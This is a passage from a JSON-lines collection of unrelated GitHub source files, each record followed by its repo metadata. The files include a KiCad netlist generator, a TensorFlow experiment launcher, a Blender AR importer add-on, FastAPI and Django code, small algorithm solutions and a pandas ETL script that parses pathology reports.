import footprint as kicad\n\n\nclass InvalidNetlistBlockException(BaseException):\n pass\n\n\nclass InvalidPackingException(BaseException):\n pass\n\n\nclass Netlist(NamedTuple): # TODO use TransformUtil.Path across the board\n blocks: Dict[str, kicad.Block] # block name: footprint name\n nets: Dict[str, List[kicad.Pin]] # net name: list of member pins\n\n\nBlocks = Dict[TransformUtil.Path, kicad.Block] # path -> Block\nEdges = Dict[TransformUtil.Path, List[TransformUtil.Path]] # Pins (block name, port / pin name) -> net-connected Pins\nAssertConnected = List[Tuple[TransformUtil.Path, TransformUtil.Path]]\nNames = Dict[TransformUtil.Path, TransformUtil.Path] # Path -> shortened path name\nClassPaths = Dict[TransformUtil.Path, List[str]] # Path -> class names corresponding to shortened path name\nclass NetlistTransform(TransformUtil.Transform):\n @staticmethod\n def path_to_pin(path: TransformUtil.Path) -> kicad.Pin:\n assert not path.links and not path.params\n return kicad.Pin('.'.join(path.blocks), '.'.join(path.ports))\n\n @staticmethod\n def flatten_port(path: TransformUtil.Path, port: edgir.PortLike) -> Iterable[TransformUtil.Path]:\n if port.HasField('port'):\n return [path]\n elif port.HasField('array') and port.array.HasField('ports'):\n return chain(*[NetlistTransform.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in port.array.ports.ports])\n else:\n raise ValueError(f\"don't know how to flatten netlistable port {port}\")\n\n def __init__(self, design: CompiledDesign, refdes_mode: str = \"pathName\"):\n self.blocks: Blocks = {}\n self.edges: Edges = {}\n self.assert_connected: AssertConnected = []\n self.short_paths: Names = {TransformUtil.Path.empty(): TransformUtil.Path.empty()} # seed root\n self.class_paths: ClassPaths = {TransformUtil.Path.empty(): []} # seed root\n self.pins: Set[TransformUtil.Path] = set()\n self.names: Names = {}\n\n self.design = design\n self.refdes_mode = refdes_mode\n\n def process_blocklike(self, path: TransformUtil.Path, block: Union[edgir.Link, edgir.LinkArray, edgir.HierarchyBlock]) -> None:\n # generate short paths for children first\n short_path = self.short_paths[path]\n class_path = self.class_paths[path]\n\n # TODO handle mixed net/connect operations\n if isinstance(block, edgir.Link) and 'nets' in block.meta.members.node:\n # Consolidate single-net link ports into just the link\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path\n\n else:\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n for link_pair in block.links:\n self.short_paths[path.append_link(link_pair.name)] = short_path.append_link(link_pair.name)\n self.class_paths[path.append_link(link_pair.name)] = class_path + [link_pair.value.link.self_class.target.name]\n\n main_internal_blocks: Dict[str, edgir.BlockLike] = {}\n other_internal_blocks: Dict[str, edgir.BlockLike] = {}\n if isinstance(block, edgir.HierarchyBlock):\n for block_pair in block.blocks:\n subblock = block_pair.value\n # ignore pseudoblocks like bridges and adapters that have no internals\n if not subblock.hierarchy.blocks and 'fp_is_footprint' not in subblock.hierarchy.meta.members.node:\n other_internal_blocks[block_pair.name] = block_pair.value\n else:\n main_internal_blocks[block_pair.name] = block_pair.value\n\n if len(main_internal_blocks) == 1:\n name = list(main_internal_blocks.keys())[0]\n self.short_paths[path.append_block(name)] = short_path\n 
self.class_paths[path.append_block(name)] = class_path\n else:\n for (name, subblock) in main_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n for (name, subblock) in other_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n if 'nets' in block.meta.members.node:\n # add all-pairs edges\n # list conversion to deal with iterable-once\n flat_ports = list(chain(*[self.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in block.ports]))\n for src_path in flat_ports:\n for dst_path in flat_ports:\n if src_path != dst_path:\n self.edges.setdefault(src_path, []).append(dst_path)\n\n if 'nets_packed' in block.meta.members.node:\n # this connects the first source to all destinations, then asserts all the sources are equal\n # this leaves the sources unconnected, to be connected externally and checked at the end\n src_port_name = block.meta.members.node['nets_packed'].members.node['src'].text_leaf\n dst_port_name = block.meta.members.node['nets_packed'].members.node['dst'].text_leaf\n flat_srcs = list(self.flatten_port(path.append_port(src_port_name), edgir.pair_get(block.ports, src_port_name)))\n flat_dsts = list(self.flatten_port(path.append_port(dst_port_name), edgir.pair_get(block.ports, dst_port_name)))\n assert flat_srcs, \"missing source port(s) for packed net\"\n for dst_path in flat_dsts:\n self.edges.setdefault(flat_srcs[0], []).append(dst_path)\n self.edges.setdefault(dst_path, []).append(flat_srcs[0])\n for src_path in flat_srcs: # assert all sources connected\n for dst_path in flat_srcs:\n self.assert_connected.append((src_path, dst_path))\n\n if 'fp_is_footprint' in block.meta.members.node:\n footprint_name = self.design.get_value(path.to_tuple() + ('fp_footprint',))\n footprint_pinning = self.design.get_value(path.to_tuple() + ('fp_pinning',))\n mfr = self.design.get_value(path.to_tuple() + ('fp_mfr',))\n part = self.design.get_value(path.to_tuple() + ('fp_part',))\n value = self.design.get_value(path.to_tuple() + ('fp_value',))\n refdes = self.design.get_value(path.to_tuple() + ('fp_refdes',))\n lcsc_part = self.design.get_value(path.to_tuple() + ('lcsc_part',))\n\n assert isinstance(footprint_name, str)\n assert isinstance(footprint_pinning, list)\n assert isinstance(mfr, str) or mfr is None\n assert isinstance(part, str) or part is None\n assert isinstance(value, str) or value is None\n assert isinstance(lcsc_part, str) or lcsc_part is None\n assert isinstance(refdes, str)\n\n part_comps = [\n part,\n f\"({mfr})\" if mfr else \"\"\n ]\n part_str = \" \".join(filter(None, part_comps))\n value_comps = [\n part_str,\n value\n ]\n value_str = \" - \".join(filter(None, value_comps))\n\n self.blocks[path] = kicad.Block(\n footprint_name,\n refdes,\n part_str,\n\n # Uncomment one to set value field\n # TODO this should be a user flag\n value_str, # including manufacturer\n # lcsc_part or \"\",\n\n list(path.blocks),\n list(self.short_paths[path].blocks),\n self.class_paths[path],\n )\n\n if self.refdes_mode == \"pathName\":\n self.names[path] = self.short_paths[path]\n elif self.refdes_mode == \"refdes\":\n self.names[path] = TransformUtil.Path.empty().append_block(refdes)\n else:\n raise ValueError(f\"Invalid valueMode value {self.refdes_mode}\")\n\n 
for pin_spec in footprint_pinning:\n assert isinstance(pin_spec, str)\n pin_spec_split = pin_spec.split('=')\n assert len(pin_spec_split) == 2\n pin_name = pin_spec_split[0]\n port_path = edgir.LocalPathList(pin_spec_split[1].split('.'))\n\n pin_path = path.append_port(pin_name)\n self.pins.add(pin_path)\n self.short_paths[pin_path] = short_path.append_port(pin_name)\n\n src_path = path.follow(port_path, block)[0]\n\n # Create a unidirectional edge from the port to the footprint pin\n self.edges.setdefault(src_path, []).append(pin_path)\n self.edges.setdefault(pin_path, []) # create a dummy entry\n\n self.names[pin_path] = self.names[path].append_port(pin_name)\n\n for constraint_pair in block.constraints:\n if constraint_pair.value.HasField('connected'):\n self.process_connected(path, block, constraint_pair.value.connected)\n elif constraint_pair.value.HasField('exported'):\n self.process_exported(path, block, constraint_pair.value.exported)\n elif constraint_pair.value.HasField('exportedTunnel'):\n self.process_exported(path, block, constraint_pair.value.exportedTunnel)\n elif constraint_pair.value.HasField('connectedArray'):\n for expanded_connect in constraint_pair.value.connectedArray.expanded:\n self.process_connected(path, block, expanded_connect)\n elif constraint_pair.value.HasField('exportedArray'):\n for expanded_export in constraint_pair.value.exportedArray.expanded:\n self.process_exported(path, block, expanded_export)\n\n def process_connected(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ConnectedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_connected(path, current, constraint.expanded[0])\n return\n assert constraint.block_port.HasField('ref')\n assert constraint.link_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.block_port.ref, current),\n path.follow(constraint.link_port.ref, current))\n\n def process_exported(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ExportedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_exported(path, current, constraint.expanded[0])\n return\n assert constraint.internal_block_port.HasField('ref')\n assert constraint.exterior_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.internal_block_port.ref, current),\n path.follow(constraint.exterior_port.ref, current))\n\n def connect_ports(self, elt1: Tuple[TransformUtil.Path, edgir.EltTypes], elt2: Tuple[TransformUtil.Path, edgir.EltTypes]) -> None:\n \"\"\"Recursively connect ports as applicable\"\"\"\n if isinstance(elt1[1], edgir.Port) and isinstance(elt2[1], edgir.Port):\n self.edges.setdefault(elt1[0], []).append(elt2[0])\n self.edges.setdefault(elt2[0], []).append(elt1[0])\n elif isinstance(elt1[1], edgir.Bundle) and isinstance(elt2[1], edgir.Bundle):\n elt1_names = list(map(lambda pair: pair.name, elt1[1].ports))\n elt2_names = list(map(lambda pair: pair.name, elt2[1].ports))\n assert elt1_names == elt2_names, f\"mismatched bundle types {elt1}, {elt2}\"\n for key in elt2_names:\n self.connect_ports(\n (elt1[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt1[1].ports, key))),\n (elt2[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt2[1].ports, key))))\n # don't need to create the bundle connect, since Bundles can't be CircuitPorts\n else:\n raise ValueError(f\"can't connect types {elt1}, {elt2}\")\n\n def visit_portlike(self, context: TransformUtil.TransformContext, port: 
edgir.PortLike) -> None:\n self.pins.add(context.path)\n\n short_path = self.short_paths[context.path]\n if port.HasField('bundle'): # TODO maybe shorten if just one?\n for port_pair in port.bundle.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n elif port.HasField('array') and port.array.HasField('ports'):\n for port_pair in port.array.ports.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n def visit_block(self, context: TransformUtil.TransformContext, block: edgir.BlockTypes) -> None:\n self.process_blocklike(context.path, block)\n\n def visit_link(self, context: TransformUtil.TransformContext, link: edgir.Link) -> None:\n self.process_blocklike(context.path, link)\n\n def visit_linkarray(self, context: TransformUtil.TransformContext, link: edgir.LinkArray) -> None:\n self.process_blocklike(context.path, link)\n\n @staticmethod\n def name_net(net: Iterable[TransformUtil.Path], net_prefix: str) -> str:\n \"\"\"Names a net based on all the paths of ports and links that are part of the net.\"\"\"\n def pin_name_goodness(pin1: TransformUtil.Path, pin2: TransformUtil.Path) -> int:\n assert not pin1.params and not pin2.params\n # TODO rewrite rules to based on _anon internal depth, though elt[0] is likely where the _anon will be\n # First disprefer anon or auto-generated names\n if pin1.links and (pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (not pin2.links or pin2.links[0].startswith('anon') or pin2.links[0].startswith('_')):\n return 1\n elif (not pin1.links or pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (pin2.links and (pin2.links[0].startswith('anon') or pin2.links[0].startswith('_'))):\n return -1\n elif len(pin1.blocks) != len(pin2.blocks): # prefer shorter block paths\n return len(pin1.blocks) - len(pin2.blocks)\n elif len(pin1.ports) == 1 and pin1.ports[0].isnumeric() and \\\n (len(pin2.ports) != 1 or (pin2.ports and not pin2.ports[-1].isnumeric())): # disprefer number-only ports\n return 1\n elif len(pin2.ports) == 1 and pin2.ports[0].isnumeric() and \\\n (len(pin1.ports) != 1 or (pin1.ports and not pin1.ports[-1].isnumeric())): # disprefer number-only ports\n return -1\n elif len(pin1.ports) != len(pin2.ports): # prefer shorter port lengths\n return len(pin1.ports) - len(pin2.ports)\n elif pin1.ports and not pin2.ports: # prefer ports\n return -1\n elif not pin1.ports and pin2.ports:\n return 1\n elif pin1.links and not pin2.links: # prefer links\n return -1\n elif not pin1.links and pin2.links:\n return 1\n else: # prefer shorter pin paths\n return len(pin1.ports) - len(pin2.ports)\n best_path = sorted(net, key=cmp_to_key(pin_name_goodness))[0]\n\n return net_prefix + str(best_path)\n\n def run(self) -> Netlist:\n self.transform_design(self.design.design)\n\n # Sanity check to ensure all pins exist\n for pin_src, pins_dst in self.edges.items():\n assert pin_src in self.pins, f\"missing net edge src pin {pin_src}\"\n for pin_dst in pins_dst:\n assert pin_dst in self.pins, f\"missing net edge dst pin {pin_dst}\"\n\n # Convert to the netlist format\n seen: Set[TransformUtil.Path] = set()\n nets: List[List[TransformUtil.Path]] = [] # use lists instead of sets to preserve ordering\n\n for port, conns in self.edges.items():\n if port not in seen:\n curr_net: List[TransformUtil.Path] = []\n frontier: List[TransformUtil.Path] = [port] # use BFS to maintain ordering instead of simpler DFS\n while 
frontier:\n pin = frontier.pop(0)\n if pin not in seen:\n seen.add(pin)\n curr_net.append(pin)\n frontier.extend(self.edges[pin])\n nets.append(curr_net)\n\n pin_to_net: Dict[TransformUtil.Path, List[TransformUtil.Path]] = {} # values share reference to nets\n for net in nets:\n for pin in net:\n pin_to_net[pin] = net\n\n for (connected1, connected2) in self.assert_connected:\n if pin_to_net[connected1] is not pin_to_net[connected2]:\n raise InvalidPackingException(f\"packed pins {connected1}, {connected2} not connected\")\n\n def name_pin(pin: TransformUtil.Path) -> TransformUtil.Path:\n if pin in self.short_paths:\n return self.short_paths[pin]\n else:\n return pin\n\n board_refdes_prefix = self.design.get_value(('refdes_prefix',))\n if board_refdes_prefix is not None:\n assert isinstance(board_refdes_prefix, str)\n net_prefix = board_refdes_prefix\n else:\n net_prefix = ''\n named_nets = {self.name_net([name_pin(pin) for pin in net], net_prefix): net\n for net in nets}\n\n netlist_blocks = {str(self.names[block_path]): block\n for block_path, block in self.blocks.items()}\n netlist_nets = {name: [self.path_to_pin(self.names[pin])\n for pin in net if pin in self.names]\n for name, net in named_nets.items()}\n\n return Netlist(netlist_blocks, netlist_nets)\n","repo_name":"BerkeleyHCI/PolymorphicBlocks","sub_path":"electronics_model/NetlistGenerator.py","file_name":"NetlistGenerator.py","file_ext":"py","file_size_in_byte":16765,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"35"} +{"seq_id":"37755447265","text":"import tensorflow as tf\nimport subprocess\nimport sys\nimport itertools\nimport json\nimport random\n\n# Parameters for loss types\nmean_over_batch = {\"True\", \"False\"}\nlinearity = {\"True\", \"False\"}\nloss_type = {\"dist\", \"ratio\"}\nloss_form = {\"log\", \"minus\", \"inverse\" }\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n\n# Params for Architecture\nlosses= [['True', 'ratio', 'minus'], ['False', 'dist', 'log'], ['True', 'dist', 'log'], ['False', 'ratio', 'minus']]\nnumber_of_layers = [3, 4]\nkernel_size = [7, 5, 3]\nchannels = [1, 2, 3]\n\n#Try later\n#dilation = [1,2]\n#dropout = [0.8,1]\n\n\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\", \"kernel_shape\", \"dialation_rate\"]\n\n#archs_perm = [losses, number_of_layers, kernel_type, channels]\n\n\ndef main(unusedargs):\n linearity_experiment()\n\n\ndef loss_experiment():\n print('Running..')\n loss_perm = [mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"loss=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n\ndef linearity_experiment():\n print('running')\n loss_perm = [linearity, mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n argnames= [\"linear\", \"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"lin=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n print(param[0])\n\n\n kernel = construct_kernel(random.choice(number_of_layers))\n if param[0]=='True':\n kernel = [[32,32,1,1]]\n\n 
script.append(\"--kernel_shape=\"+json.dumps(kernel).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n# Experiment for architectures\ndef architecture_experiment():\n kernel_shapes = []\n for i in range (40):\n kernel_shapes.append(construct_kernel(random.choice(number_of_layers)))\n\n archs_perm = [losses, kernel_shapes]\n params = list(itertools.product(*archs_perm))\n argnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n #print(len(params))\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"arch_l\" + str(len(param[1]))+\"=[\"\n for row in param[1]:\n name += str(row[0])+\",\"+str(row[3])+\"-\"\n name +=\"]\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[0][i])\n name += '_'+param[0][i]\n i = i + 1\n\n script.append(\"--kernel_shape=\"+json.dumps(param[1]).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=400\")\n script = ' '.join(script)\n #print(name)\n subprocess.call(script, shell=True)\n\n\n\ndef construct_kernel(num_layer):\n\n def calc_channel(k_size, coef):\n return 25*coef/(k_size)\n\n k_size = random.choice(kernel_size)\n if num_layer == 1:\n return [[k_size, k_size, 1, 1]]\n\n k_last_size = random.choice(kernel_size)\n coef = random.choice(channels)\n channel = calc_channel(k_last_size, coef)\n kernel_shape = [[k_size, k_size, 1, channel]]\n\n if num_layer == 2:\n new_layer = [k_last_size, k_last_size, channel, 1]\n kernel_shape.append(new_layer)\n return kernel_shape\n\n if num_layer>2:\n for i in range(num_layer-2):\n old_channel = channel\n coef = random.choice(channels)\n k_size = random.choice(kernel_size)\n channel = calc_channel(k_size, coef)\n\n new_layer = [k_size, k_size, old_channel, channel]\n kernel_shape.append(new_layer)\n\n new_layer = [k_last_size, k_last_size, channel, 1]\n kernel_shape.append(new_layer)\n return kernel_shape\n\n\nif __name__ == '__main__':\n tf.app.run(main=main, argv=[sys.argv[0]])\n","repo_name":"seung-lab/FilterFinder","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"22844441013","text":"\nimport bpy\nfrom bpy.props import *\nfrom bpy.types import Menu, Operator, Panel, UIList, AddonPreferences\nfrom bpy.app.handlers import persistent\nimport os\nfrom os.path import basename, dirname, join\nimport shutil\nimport requests\n\nclass ARImporterAddonPreferences(AddonPreferences):\n\n bl_idname = basename(dirname(__file__)) # directory name containing this file\n\n ip_address = StringProperty(\n name=\"IP Address\",\n )\n\n ar_root = StringProperty(\n name=\"Storage root\",\n subtype='FILE_PATH',\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"ip_address\")\n layout.prop(self, \"ar_root\")\n\n# -------------------------------------------------------------------------------\n# UI PANEL - Extra Image List\n# -------------------------------------------------------------------------------\nclass ARImporter_PT_ImagePreview(Panel):\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_category = \"AR Importer\"\n bl_label = \"Import\"\n\n def draw(self, context):\n layout = self.layout\n row = layout.row()\n row.operator(\"arimporter.latest\", text=\"Import Latest\")\n\n\nclass ARImportLatest(Operator):\n bl_idname = 
\"arimporter.latest\"\n bl_label = \"Latest\"\n bl_description = \"AR Import Latest\"\n\n def execute(self, context):\n user_preferences = context.user_preferences\n addon_prefs = user_preferences.addons[basename(dirname(__file__))].preferences\n root_url = \"http://%s/\" % addon_prefs.ip_address\n\n print(\"Importing latest \" + addon_prefs.ip_address)\n resp = requests.get(root_url + \"shots\").json()\n latest = resp[0]\n print(latest)\n local_shot_dir = join(addon_prefs.ar_root, latest[\"uuid\"])\n\n file_types = [\"_pointcloud_z.ply\", \".mov\", \"_scene.fbx\"]\n try:\n # Create target Directory\n os.mkdir(local_shot_dir)\n except FileExistsError:\n print(\"Directory \", local_shot_dir, \" already exists\")\n\n local_files = []\n for file_type in file_types:\n remote_url = root_url + \"content/shots/%s/shot-%s%s\" % (latest[\"uuid\"], latest[\"uuid\"], file_type)\n file_basename = basename(remote_url)\n local_file = join(local_shot_dir, file_basename)\n local_files.append(local_file)\n r = requests.get(remote_url, allow_redirects=True)\n open(local_file, 'wb').write(r.content)\n\n for local_file in local_files:\n if local_file.endswith(\".fbx\"):\n bpy.ops.import_scene.fbx(filepath=local_file, anim_offset=0, bake_space_transform=True)\n if local_file.endswith(\".ply\"):\n bpy.ops.import_mesh.ply(filepath=local_file)\n if local_file.endswith(\".mov\"):\n clip = bpy.data.movieclips.load(local_file)\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n space_data = area.spaces.active\n space_data.show_background_images = True\n bg = space_data.background_images.new()\n bg.clip = clip\n bg.source = 'MOVIE_CLIP'\n bg.use_camera_clip = False\n bg.opacity = 1\n break\n\n return {'FINISHED'}\n\n\n","repo_name":"FreakTheMighty/BlenderARImporter","sub_path":"ar_importer_utils.py","file_name":"ar_importer_utils.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13727799760","text":"\"\"\"GET endpoints for users.\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom db.database import get_db\nimport schemas\nfrom db import crud\n\nrouter = APIRouter(prefix=\"/users\", tags=[\"user\"])\n\n\n@router.get(\"/\", response_model=list[schemas.UserInfo])\nasync def read_users_id(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n \"\"\"Read all users ids.\"\"\"\n items = crud.get_all_users(db, skip=skip, limit=limit)\n if len(items) == 0:\n raise HTTPException(status_code=404, detail=\"Users not found\")\n return items\n\n\n@router.get(\n \"/{telegram_id}\", response_model=schemas.UserEdit, status_code=status.HTTP_200_OK\n)\nasync def read_user(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Read user by telegram id without list of sent articles.\"\"\"\n db_user = crud.get_user(db, user_telegram_id=telegram_id)\n if db_user is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND, detail=\"User not found\"\n )\n return db_user\n\n\n@router.get(\"/{telegram_id}/articles\", response_model=schemas.UserArticlesSentView)\nasync def read_user_with_sent_articles(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Get user info with a list of sent articles matching language code and user_telegram_id.\"\"\"\n db_articles = crud.get_user(db, user_telegram_id=telegram_id)\n if db_articles is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return 
db_articles\n","repo_name":"VetalM84/fastApiKafkaBot","sub_path":"routers/users_get.py","file_name":"users_get.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"29888259932","text":"import numpy as np\r\nimport math\r\nimport pandas as pd\r\n\r\ndf=pd.read_csv(\"A2Q2Data_train.csv\", sep=',',header=None)#The dataset is imported\r\n#please change the location of the file to that in the local computer\r\ndataset = df.to_numpy()\r\n\r\ny=dataset[:,100]\r\nX=dataset[:,0:100]\r\n\r\n\r\nX=np.transpose(X) #here the data points are in rows, this statement converts them to column notation\r\ny=np.transpose(y)\r\nw_ml=np.matmul(np.matmul((np.linalg.pinv(np.matmul(X,np.transpose(X)))),X),y)#The analytical solution for w_ml is directly used\r\nprint(w_ml)\r\n\r\n\r\n","repo_name":"Keshkrish/Machine-Learning-Algorithms","sub_path":"Linear_regression_analytically.py","file_name":"Linear_regression_analytically.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16828075786","text":"from django.forms import ModelForm\nfrom .models import Entry\nfrom preferences import preferences\nfrom django.utils import timezone\nfrom django import forms\n\nclass EntryForm(ModelForm):\n class Meta:\n model = Entry\n fields = ['entry_date', 'destination', 'notes', 'odo_start', 'odo_end']\n widgets = {\n 'entry_date': forms.DateTimeInput(attrs={'placeholder': 'M/D/YYYY'}, format=\"%m/%d/%y\"),\n }\n \n def save(self, request, commit=True):\n obj = super().save(commit=False)\n obj.user = request.user\n obj.pub_date = timezone.now().date()\n obj.pay_period_start = obj.get_start_of_pay_period_date()\n obj.pay_period_end = obj.get_end_of_pay_period_date()\n \n if 'save' in request.POST:\n obj.draft = False\n elif 'save_as_draft' in request.POST:\n obj.draft = True\n\n if commit:\n obj.save()\n else:\n return obj\n ","repo_name":"jacksonfoster4/mileage_tfw","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6963442278","text":"class Solution:\n\n # important question review\n # how to explore new properties to reduce time complexity\n # method in math without dp\n # need further optimizing\n def superEggDrop(self, K: int, N: int) -> int:\n f = lambda x, a, b: x if a <= b else x + 1\n ans = [[0 for _ in range(K+1)] for _ in range(N+1)]\n for n in range(1, N+1):\n ans[n][1] = n\n for k in range(2, K+1):\n ans[1][k] = 1\n ans[min(2, N)][k] = min(2, N)\n ans[min(3, N)][k] = min(2, N)\n for k in range(2, K+1):\n x = 1\n for n in range(4, N+1):\n x = f(x, max(ans[x-1][k-1], ans[n-x][k]), max(ans[x][k-1], ans[n-x-1][k]))\n ans[n][k] = max(ans[x-1][k-1], ans[n-x][k] + 1)\n return ans[-1][-1]\n\n\nsol = Solution()\nprint(sol.superEggDrop(3, 1000))\n","repo_name":"ParkerMa1879/leetCode","sub_path":"Hard/Q887/SuperEggDrop.py","file_name":"SuperEggDrop.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34776032974","text":"# 백준 2294\n# 골드 5 / 동전 2\nimport sys\n\nn, k = map(int,sys.stdin.readline().split())\n\ndp = [float('inf') for _ in range(k+1)]\ncoin_set = set([])\nfor _ in range(n) :\n coin = int(sys.stdin.readline().strip())\n if coin > k :\n continue\n coin_set.add(coin)\n # 
초기값 설정\n dp[coin] = 1\n\nfor i in range(1, k+1) :\n for item in coin_set :\n if i - item >= 1 :\n dp[i] = min(dp[i], dp[i-item] + 1)\n\nif dp[k] == float('inf') :\n print(-1)\nelse :\n print(dp[k])","repo_name":"leeyej-i/algorithm","sub_path":"DP/2294.py","file_name":"2294.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43124762703","text":"from main.helpers import update_monument, format_monument, search_commons_url, search_commons_wlm\nfrom main.wiki_api import execute_query\nfrom django.core.management.base import BaseCommand, CommandError\nfrom main.models import Monument, CategorySnapshot\n\n\nclass Command(BaseCommand):\n help = 'Takes new snapshot'\n\n def add_arguments(self, parser):\n parser.add_argument('id', type=int)\n\n def handle(self, *args, **options):\n\n m = Monument.objects.get(pk=options['id'])\n print(m.relevant_images)\n\n for relevant_image_url in m.relevant_images:\n relevant_images_data = search_commons_url(relevant_image_url)\n print(relevant_images_data)\n\n if m.wlm_n:\n wlm_images_data = search_commons_wlm(m.wlm_n)\n print(len(wlm_images_data))\n\n \n","repo_name":"densitydesign/wlm-backend","sub_path":"server/wlm/main/management/commands/update_monument_pictures.py","file_name":"update_monument_pictures.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74433260580","text":"import pandas as pd\nfrom pandas import DataFrame\nfrom base_etl import BaseETL\nfrom nltk.tokenize import LineTokenizer\nfrom functools import reduce\nline_tokenizer = LineTokenizer()\n\nclass GeneticStep02(BaseETL):\n\n def run(\n self,\n ):\n sql = \"SELECT * FROM gc_protocol.genetic_step_01 WHERE nullif(병리진단,'') is not null;\"\n df = self.df_from_sql(db_name=\"gc_protocol\", sql=sql)\n\n data = df.set_index(\"원무접수ID\")\n \n\n data_li = data.values.tolist()\n index_li = data.index.tolist()\n x = len(data_li)\n\n print(x)\n\n for j in range(1,15):\n exec(f\"A{j} = list(0 for i in range(0,x))\")\n \n\n for i in range(0,x):\n string = ''.join(data_li[i])\n list_void = line_tokenizer.tokenize(string)\n for j in range(1,15):\n exec(f\"A{j}[i] = []\")\n exec(f\"A{j}[i].append(index_li[i])\")\n for word in list_void:\n word_low = word.lower()\n if 'c-erb-b2' in word_low:\n eval(\"A1[i].append(word)\")\n if 'e-cadherin' in word_low:\n eval('A2[i].append(word)')\n if 'p53' in word_low:\n eval('A3[i].append(word)')\n if 'ki 67' in word_low:\n eval('A4[i].append(word)')\n if 'ki-67' in word_low:\n eval('A4[i].append(word)')\n if 'cd31 and d2-40' in word_low:\n eval('A5[i].append(word)')\n if 'c-kit' in word_low:\n eval('A6[i].append(word)')\n if 'cd34' in word_low:\n eval('A7[i].append(word)')\n if 'pkc-theta' in word_low:\n eval('A8[i].append(word)')\n if 's-100 protein' in word_low:\n eval('A9[i].append(word)')\n if 'a-sma' in word_low:\n eval('A10[i].append(word)')\n if 'smooth muscle actin' in word_low:\n eval('A10[i].append(word)')\n if 'ck' in word_low:\n eval('A11[i].append(word)')\n if 'chromogranin' in word_low:\n eval('A12[i].append(word)')\n if 'ebv' in word_low:\n eval('A13[i].append(word)')\n if 'giemsa' in word_low:\n eval('A14[i].append(word)')\n \n for j in range(1,15):\n exec(f\"dataA{j}=DataFrame(A{j})\")\n \n\n print(eval(\"dataA1\"))\n print(eval(\"dataA2\"))\n print(eval(\"dataA3\"))\n print(eval(\"dataA4\"))\n print(eval(\"dataA5\"))\n print(eval(\"dataA6\"))\n 
